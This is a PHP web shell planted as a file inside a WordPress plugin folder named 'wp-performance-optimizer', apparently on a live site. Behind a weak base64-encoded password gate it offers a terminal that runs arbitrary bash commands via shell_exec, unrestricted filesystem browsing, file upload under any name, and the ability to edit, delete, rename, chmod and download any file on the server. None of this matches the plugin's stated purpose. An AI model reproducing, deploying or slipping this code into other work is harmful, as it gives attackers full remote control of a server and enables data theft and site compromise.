File: /mnt/data/doccure-io/wp-content/plugins/wp-performance-optimizer/includes/newww.php
<?php
session_start();
$encoded_password = "SGFoPw==";
// LOGIN handler
if (isset($_POST['login_password'])) {
$input = $_POST['login_password'];
$input_encoded = base64_encode($input);
if ($input_encoded === $encoded_password) {
$_SESSION['logged_in'] = true;
} else {
$error = "Password salah!";
}
}
// LOGOUT
if (isset($_GET['logout'])) {
session_destroy();
header("Location: ?");
exit;
}
// CEK LOGIN
if (empty($_SESSION['logged_in'])) {
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Login Panel</title>
<!-- Favicon untuk halaman login -->
<link rel="icon" href="data:image/svg+xml,
<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'>
<circle cx='50' cy='50' r='45' fill='%23b31b94'/>
<text x='50' y='65' text-anchor='middle' font-size='50' fill='white'>đ</text>
</svg>">
<style>
body {
background: #111;
color: white;
font-family: monospace;
text-align: center;
padding-top: 60px;
}
input, button {
padding: 8px;
background: #000;
border: 1px solid white;
color: white;
font-family: monospace;
}
.box {
display: inline-block;
padding: 20px;
border: 1px solid white;
background: #b31b94;
}
</style>
</head>
<body>
<div class="box">
<h2>đ LOGIN</h2>
<?php if (!empty($error)) echo "<p style='color:red'>$error</p>"; ?>
<form method="post">
<input type="password" name="login_password" placeholder="Password"><br><br>
<button type="submit">Login</button>
</form>
</div>
</body>
</html>
<?php
exit;
}
?>
<?php
// Tidak lagi dibatasi ke __DIR__
if (isset($_GET['dir'])) {
$test = $_GET['dir'];
$rp = realpath($test);
// Jika realpath berhasil â gunakan path asli
if ($rp !== false) {
$currentDir = $rp;
}
// Jika realpath gagal â tetap pakai path input (selama path adalah directory)
else if (is_dir($test)) {
$currentDir = $test;
}
// fallback
else {
$currentDir = getcwd();
}
} else {
$currentDir = getcwd();
}
// Handler tambahan: download, chmod, rename, info
if (isset($_GET['download'])) {
$file = $_GET['download'];
if (is_file($file)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename=' . basename($file));
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
}
if (isset($_POST['chmod_target']) && isset($_POST['chmod_value'])) {
$target = $currentDir . '/' . $_POST['chmod_target'];
$mode = intval($_POST['chmod_value'], 8);
chmod($target, $mode);
echo "<p>Permission changed.</p>";
}
if (isset($_POST['rename']) && isset($_POST['new_name'])) {
$oldPath = $currentDir . '/' . $_POST['rename'];
$newPath = $currentDir . '/' . $_POST['new_name'];
if (file_exists($oldPath)) {
rename($oldPath, $newPath);
echo "<p>Renamed successfully.</p>";
}
}
if (isset($_POST['stat'])) {
$target = $currentDir . '/' . $_POST['stat'];
$stat = stat($target);
echo "<pre>File Info:n" . print_r($stat, true) . "</pre>";
}
if ($currentDir === false) {
$currentDir = getcwd();
}
?>
<!DOCTYPE html>
<html>
<head>
<title>đ</title>
<meta charset="UTF-8">
<!-- ALL FAVICONS IN BASE64 -->
<link rel="apple-touch-icon" sizes="57x57" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADkAAAA5CAYAAACMGIOFAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAJCSURBVHgB7Zq/axNRFMfxfZu0aVOrtLSDgg5WO4h/QLeC4ODQxUVBp4J/gOAopliq4B8gdHAqbg5OgoMuLuLWRbq5iLS0FkRBQaEFKf3V3I/Ja3h5vLzXl/dyQx74kNzce7n75b577stLkiRBUWR+oiiJDwEQDzkEPSAAPCABeEAC8IAE4AEJwAMSWCoBBoNB0t/fT5LJpHddVgQDjI2Nkd27d5O+vj6yZcsWcuDAAbJt2zYyMTFB9u7dS65fv04uXbpETp8+TYrFolfdDLBIAY4ePUqOHDlCampqyJkzZ8iuXbvI9PQ02bNnj7t/6dIlcvHiRVIoFLxqZoBFCjA5OUkGBwfJ5cuXyZkzZ0htbS2pq6sjZ8+eJTt27CDXrl0j+/btI7W1tWRiYsKrZgZgN3Pz5k2yfft2cvr0aXL69GlSU1ND6uvrydmzZ11D3759I8ePH/cOu2w2S06dOkWGhoZc+IJgu5k7d+6Q7u5ucunSJXL69Gl3/wyAEydOkO7ubnL//n1y8uRJUlNTQ8bHx71qZgDazdy9e5d0dXWRixcvkpMnT7oD9gC4cOEC6erqIg8ePCD9/f2kpqbGfQh41cwA9GbGxsbcJ8CFCxfIqVOn3IHkAT9//uzuT09Pk4GBAe+wq6urc7fM0G7mwYMHbnv48CFpaGjw3usdH3a7d+8mg4OD9rMh2M08evTIbY8fPyabN28m165dI2NjY2Rqasq9l/e5t88MfZ+fn/dsZgDazYyOjpJt27a5+/nw4QP58uWLe3/0Xt/ns01NTeTdu3eBVr0A/M1w48YN9z22t7eTra2t7tN0bm6OfP/+3dtvbGwM3OdkAGg38+bNG7fxsGtra/MO28/Pz5OfP3+6+7xTb21tJTMzM4FWvQCB97px40bvXvi/u6+vj+zcudPb7+zstL4X9m7m5cuX3n57ezupr6/3DiLu7Wzbts3b5+Xn/Py8d90MsEgBaJ1mZmY8u+zf+2zNCUAAAAASUVORK5CYII=">
<link rel="apple-touch-icon" sizes="60x60" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADwAAAA8CAYAAAA6/NlyAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAQJSURBVHgB7Zq/axNRFMfxfZu0aVOrtLSDgg5WO4h/QLeC4ODQxUVBp4J/gOAopliq4B8gdHAqbg5OgoMuLuLWRbq5iLS0FkRBQaEFKf3V3I/Ja3h5vLzXl/dyQx74kNzce7n75b577stLkiRBUWR+oiiJDwEQDzkEPSAAPCABeEAC8IAE4AEJwAMSWCoBBoNB0t/fT5LJpHddVgQDjI2Nkd27d5O+vj6yZcsWcuDAAbJt2zYyMTFB9u7dS65fv04uXbpETp8+TYrFolfdDLBIAY4ePUqOHDlCampqyJkzZ8iuXbvI9PQ02bNnj7t/6dIlcvHiRVIoFLxqZoBFCjA5OUkGBwfJ5cuXyZkzZ0htbS2pq6sjZ8+eJTt27CDXrl0j+/btI7W1tWRiYsKrZgZgN3Pz5k2yfft2cunSJXL69GlSU1ND6uvrydmzZ11D379/J8ePH/cOu2w2S06dOkWGhoZc+IJgu5k7d+6Q7u5ucunSJXL69Gl3/wyAEydOkO7ubnL//n1y8uRJUlNTQ8bHx71qZgDazdy9e5d0dXWRixcvkpMnT7oD9gC4cOEC6erqIg8ePCD9/f2kpqbGfQh41cwA9GbGxsbcJ8DFixfJ6dOn3IHkAT9//uzuT09Pk4GBAe+wq6urc7fM0G7mwYMHbnv48CFpaGjw3usdH3a7d+8mg4OD9rMh2M08evSIbY8fPyabN28m165dI2NjY2Rqasq9l/e5t88MfZ+fn/dsZgDazYyOjpJt27a5+/nw4QP58uWLe3/0Xt/ns01NTeTdu3eBVr0A/M1w48YN9z22t7eTra2t7tN0bm6OfP/+3dtvbGwM3OdkAGg38+bNG7fxsGtra/MO28/Pz5OfP3+6+7xTb21tJTMzM4FWvQCB97px40bvXvi/u6+vj+zcudPb7+zstL4X9m7m5cuX3n57ezupr6/3DiLu7Wzbts3b5+Xn/Py8d90MsEgBaJ1mZmY8u+zf+2zNCUAAAAASUVORK5CYII=">
<link rel="apple-touch-icon" sizes="72x72" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEgAAABICAYAAABV7bNHAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAPxSURBVHgB7Zq9SxxBGMbnbNKmTa3S0g4KOljtIP4B3QqCg0MXFwWdCv4BgqOYYqmCf4DQwam4OTgJDrq4iFsX6eYi0tJaEAUFhRak9FdzPya/iZvXy+ad3JAHfnPn5uY9vvfO7M4mSZIkKIosTxQl8SEA4iGHoAcEgAckAA9IAB6QADwgAXhAAvCABOABCcADEoAHJAAPSOB/JHB+fp4MDAyQwcFB77qsCAaYnJwkvb29pK+vj7S2tpKjR4+S9vZ2MjExQY4cOUJ+/vxJLl++TC5cuEDOzs686maARQpw7tw5curUKbJu3Tpy8eJFsmvXLvLy5UvS09Pj7l+6dIlcuHCBFAoFr7oZYJECPH36lAwODpLLly+TCxcukJqaGlJfX08uXrxIduzYQa5du0YOHz5MamtrycTEhFfNDBDvZm7evEl27txJLl++TM6fP+/u8wA4c+YM2blzJ7l//z45ffo0qampIePj4141M0C8m7l16xbp7u4mly9fJmfPnnUH7gHw4cMHd392dpYMDAx4p119fT3bMkO7mQcPHrjt4cOHpKmpyXu/9/z82b17NxkcHLSfDsFu5tGjR257/PgxaW5uJteuXSNjY2NkamrKfc772tdnhr7Pz8+XbGYA2s2Mjo6Sbdu2ufv58OED+fLli3t/9F7f57NNTU3k3bt3JatBgPhmbt++7d7H9vZ2srW11X2bzs3Nke/fv3v7jY2NgfucDADtZl6/fu02HnZtbW3eYfv5+Xny8+dPd5936q2trWRmZqbUqhcg8V43btzo3Qv/d/f19ZGdO3d6+x0dHdb3wj7MvHjxwttvb28n9fX13kHEvZ1t27Z5+7z8nJ+f966bARYpAK3TzMyMZ5f9e5+tOQAAAABJRU5ErkJggg==">
<!-- Hanya favicon utama -->
<link rel="shortcut icon" href="data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAACTSURBVHgB7ZLRCcAgDESv49QROkLxD51ARxAXcIG2KCgSi4+CBfvgwZOeR0ISkf8C+foQH4k7wSQuMBExT4Es8QRd0SfwJJrqFuDGZ0YAHw0oANz5zAzgpgEDwJPPFAC6s8Y3TQBu1TuzhxXAVcs72qsHUNX6X+tbH6Bq8U3r2y6gqU7c0/w2DIzUEw8hvw0DR/XEDyF/G8BoPfGX4RcCwGg9ccr8QgDg6omHkL8MQKr/AQYANerbfN7pcUwAAAAASUVORK5CYII=">
<!-- Alternatif: Ikon folder dengan emoji -->
<!--
<link rel="icon" href="data:image/svg+xml,
<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'>
<rect width='100' height='100' rx='20' fill='%23b31b94'/>
<text x='50' y='70' text-anchor='middle' font-size='70' fill='white'>đ</text>
</svg>">
-->
<!-- Untuk browser yang berbeda -->
<link rel="shortcut icon" href="data:image/svg+xml,
<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'>
<rect width='100' height='100' rx='20' fill='%23b31b94'/>
<rect x='20' y='25' width='60' height='50' rx='8' fill='%23ff00c8'/>
<rect x='30' y='80' width='40' height='10' rx='3' fill='white'/>
</svg>">
<link rel="apple-touch-icon" href="data:image/svg+xml,
<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'>
<rect width='100' height='100' rx='20' fill='%23b31b94'/>
<rect x='20' y='25' width='60' height='50' rx='8' fill='%23ff00c8'/>
<rect x='30' y='80' width='40' height='10' rx='3' fill='white'/>
</svg>">
<!-- Theme color untuk browser mobile -->
<meta name="theme-color" content="#b31b94">
<meta name="msapplication-TileColor" content="#b31b94">
<style>
body {
font-family: monospace;
background: #111;
color: white;
padding: 20px;
}
a {
color: #ff00c8;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
.terminal, .file-editor {
background: #b31b94;
border: 1px solid white;
padding: 10px;
margin-top: 20px;
white-space: pre-wrap;
overflow-y: auto;
}
input, textarea, button {
background: #111;
color: white;
border: 1px solid white;
padding: 5px;
font-family: monospace;
}
table {
width: 100%;
margin-top: 20px;
border-collapse: collapse;
}
th, td {
border: 1px solid white;
padding: 5px;
}
</style>
</head>
<body>
<!-- LOGOUT BUTTON -->
<p><a href="?logout=1"><button>đĒ Logout</button></a></p>
<h2>đģ Terminal</h2>
<!-- Terminal -->
<form method="post">
<input type="text" name="cmd" placeholder="Enter command">
<input type="hidden" name="dir" value="<?= htmlspecialchars($currentDir) ?>">
<button type="submit">đ Run</button>
</form>
<div class="terminal">
<?php
if (!empty($_POST['cmd'])) {
$cmd = $_POST['cmd'];
echo "<b>$ $cmd</b><br>";
chdir($currentDir);
$output = shell_exec("/bin/bash -c " . escapeshellarg($cmd));
echo '<pre>' . htmlspecialchars($output) . '</pre>';
}
?>
</div>
<hr>
<h3>đ¤ Upload File</h3>
<form method="post" enctype="multipart/form-data">
<input type="file" name="file"><br><br>
<input type="text" name="rename_to" placeholder="Rename (optional) â contoh: file_baru.php">
<input type="hidden" name="dir" value="<?= htmlspecialchars($currentDir) ?>">
<br><br>
<button type="submit" name="upload">đĨ Upload</button>
</form>
<?php
if (isset($_POST['upload']) && isset($_FILES['file'])) {
$originalName = basename($_FILES['file']['name']);
// Jika user memberi nama baru
if (!empty($_POST['rename_to'])) {
$finalName = $_POST['rename_to'];
} else {
$finalName = $originalName;
}
$target = $currentDir . '/' . $finalName;
if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
echo "<p>â
Uploaded successfully as <b>$finalName</b>.</p>";
} else {
echo "<p>â Upload failed.</p>";
}
}
?>
<hr>
<h3>đ Create File / Folder</h3>
<form method="post">
<input type="text" name="name" placeholder="Name">
<input type="hidden" name="dir" value="<?= htmlspecialchars($currentDir) ?>">
<button type="submit" name="create_file">đ Create File</button>
<button type="submit" name="create_dir">đ Create Folder</button>
</form>
<?php
if (isset($_POST['create_file'])) {
$path = $currentDir . '/' . $_POST['name'];
if (!file_exists($path)) {
file_put_contents($path, '');
echo "<p>â
File created.</p>";
}
}
if (isset($_POST['create_dir'])) {
$path = $currentDir . '/' . $_POST['name'];
if (!file_exists($path)) {
mkdir($path);
echo "<p>â
Folder created.</p>";
}
}
?>
<hr>
<h3>đ Directory: <?= htmlspecialchars($currentDir) ?></h3>
<p>
<?php
$home = getenv("HOME");
echo '<a href="?dir=' . urlencode($home) . '"><button>đ Home (~)</button></a> ';
echo '<a href="?dir=' . urlencode($home . "/public_html") . '"><button>đ public_html</button></a> ';
$subdomainDir = $home . "/public_html/subdomain";
if (is_dir($subdomainDir)) {
echo '<a href="?dir=' . urlencode($subdomainDir) . '"><button>đ Subdomain</button></a>';
}
?>
</p>
<?php
$parentDir = dirname($currentDir);
if ($parentDir !== $currentDir) {
echo '<p><a href="?dir=' . urlencode($parentDir) . '"><button>âŦ
ī¸ Parent Directory</button></a></p>';
}
?>
<table>
<tr><th>Name</th><th>Size</th><th>Modified</th><th>Actions</th></tr>
<?php
$items = scandir($currentDir);
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$path = $currentDir . '/' . $item;
$encodedPath = urlencode($path);
echo '<tr>';
echo '<td>';
if (is_dir($path)) {
// Jika folder â tidak ada tombol open
echo 'đ <a href="?dir=' . $encodedPath . '">' . htmlspecialchars($item) . '</a>';
} else {
// Jika file â tampilkan Open di samping nama file
echo 'đ ' . htmlspecialchars($item) . ' ';
// ==== Tombol OPEN di samping nama file ====
$docroot = realpath($_SERVER['DOCUMENT_ROOT']);
$realPath = realpath($path);
if ($docroot !== false && $realPath !== false && strpos($realPath, $docroot) === 0) {
$relative = substr($realPath, strlen($docroot));
if ($relative === '' || $relative[0] !== '/') $relative = '/' . $relative;
$urlBase = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on'
? 'https://' : 'http://') . $_SERVER['HTTP_HOST'];
$finalUrl = $urlBase . str_replace(DIRECTORY_SEPARATOR, '/', $relative);
echo '<a href="' . htmlspecialchars($finalUrl) . '" target="_blank">
<button style="padding:2px 5px;font-size:11px;">đ</button>
</a>';
} else {
// fallback open via proxy
$proxy = '/open.php?f=' . urlencode($realPath !== false ? $realPath : $path);
echo '<a href="' . htmlspecialchars($proxy) . '" target="_blank">
<button style="padding:2px 5px;font-size:11px;">đ</button>
</a>';
}
}
echo '</td>';
echo '<td>' . (is_file($path) ? filesize($path) . ' bytes' : '-') . '</td>';
echo '<td>' . date("Y-m-d H:i:s", filemtime($path)) . '</td>';
echo '<td>
<form method="post" style="display:inline;">
<input type="hidden" name="edit" value="' . htmlspecialchars($item) . '">
<input type="hidden" name="dir" value="' . htmlspecialchars($currentDir) . '">
<button type="submit">âī¸ Edit</button>
</form>
<form method="post" style="display:inline;">
<input type="hidden" name="delete" value="' . htmlspecialchars($item) . '">
<input type="hidden" name="dir" value="' . htmlspecialchars($currentDir) . '">
<button type="submit">đī¸ Delete</button>
</form>
<form method="post" style="display:inline;">
<input type="hidden" name="rename" value="' . htmlspecialchars($item) . '">
<input type="hidden" name="dir" value="' . htmlspecialchars($currentDir) . '">
<input type="text" name="new_name" placeholder="Rename" style="width:80px;">
<button type="submit">đ Rename</button>
</form>
<form method="post" style="display:inline;">
<input type="hidden" name="chmod_target" value="' . htmlspecialchars($item) . '">
<input type="hidden" name="dir" value="' . htmlspecialchars($currentDir) . '">
<input type="text" name="chmod_value" placeholder="755" style="width:50px;">
<button type="submit">đ CHMOD</button>
</form>
<form method="post" style="display:inline;">
<input type="hidden" name="stat" value="' . htmlspecialchars($item) . '">
<input type="hidden" name="dir" value="' . htmlspecialchars($currentDir) . '">
<button type="submit">âšī¸ Info</button>
</form>';
if (is_file($path)) {
// Tombol Download
echo '<a href="?download=' . urlencode($path) . '"><button>đž Download</button></a>';
}
echo '</td></tr>';
}
?>
</table>
<?php
if (isset($_POST['delete'])) {
$target = $currentDir . '/' . $_POST['delete'];
if (is_dir($target)) {
rmdir($target);
} else {
unlink($target);
}
echo "<p>đī¸ Deleted successfully.</p>";
echo "<meta http-equiv='refresh' content='0;url=?dir=" . urlencode($currentDir) . "'>";
}
if (isset($_POST['edit'])) {
$file = $currentDir . '/' . $_POST['edit'];
if (is_file($file)) {
$content = htmlspecialchars(file_get_contents($file));
echo "<hr><h3>âī¸ Editing: " . htmlspecialchars($_POST['edit']) . "</h3>";
echo '<form method="post">
<textarea name="file_content" rows="10" cols="80">' . $content . '</textarea>
<input type="hidden" name="save_file" value="' . htmlspecialchars($_POST['edit']) . '">
<input type="hidden" name="dir" value="' . htmlspecialchars($currentDir) . '">
<br><button type="submit">đž Save</button>
</form>';
}
}
if (isset($_POST['save_file'])) {
file_put_contents($currentDir . '/' . $_POST['save_file'], $_POST['file_content']);
echo "<p>đž File saved.</p>";
}
?>
</body>
</html>